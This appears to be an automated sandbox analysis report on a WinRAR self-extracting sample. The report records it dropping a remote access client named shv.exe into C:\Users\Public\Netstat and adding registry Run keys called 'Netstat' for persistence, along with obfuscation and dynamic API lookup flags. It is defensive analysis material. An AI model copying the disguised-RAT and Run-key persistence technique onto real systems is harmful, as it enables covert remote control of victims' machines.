Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pciinv.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: file.exe

Static file information: File size 2283788 > 1048576

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\Public\Netstat\msvcr100.dll

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000006.00000002.3996339764.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.2165257502.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.2264988650.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000D.00000002.2351625613.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.2432218131.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000006.00000002.3996589650.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.2166045519.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.2265311157.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000D.00000002.2352005765.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.2432458267.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000006.00000002.3996495464.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.2165773946.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.2265179419.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000D.00000002.2351793987.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.2432366354.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,

6_2_11029590

File is packed with WinRar

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_6430546

Jump to behavior

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name: .didat
Source: file.exe	Static PE information: section name: _RDATA
Source: PCICL32.DLL.0.dr	Static PE information: section name: .hhshare

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C5156 push rsi; retf	0_2_00007FF70E7C5157
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C5166 push rsi; retf	0_2_00007FF70E7C5167
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1116F055 push ecx; ret	6_2_1116F068
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11169F49 push ecx; ret	6_2_11169F5C
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1116F055 push ecx; ret	9_2_1116F068
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11169F49 push ecx; ret	9_2_11169F5C

Source: msvcr100.dll.0.dr

Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\pcicapi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\shv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\HTCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\PCICHEK.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\Public\Netstat\PCICL32.DLL	Jump to dropped file

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_6D1D7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,

6_2_6D1D7030

Source: C:\Users\Public\Netstat\shv.exe

6_2_11127E10

Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	6_2_11139090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	6_2_1115B1D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	6_2_11113290
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	6_2_110254A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_110258F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	6_2_11023BA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_11024280
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11112670 IsIconic,GetTickCount,	6_2_11112670
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	6_2_110C0BB0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	9_2_1115B1D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	9_2_11139090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	9_2_11113290
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	9_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	9_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	9_2_110254A0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,	9_2_110258F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	9_2_11023BA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	9_2_11024280
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11112670 IsIconic,GetTickCount,	9_2_11112670
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	9_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	9_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	9_2_110C0BB0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	9_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	9_2_1115ADD0

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_11143570

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
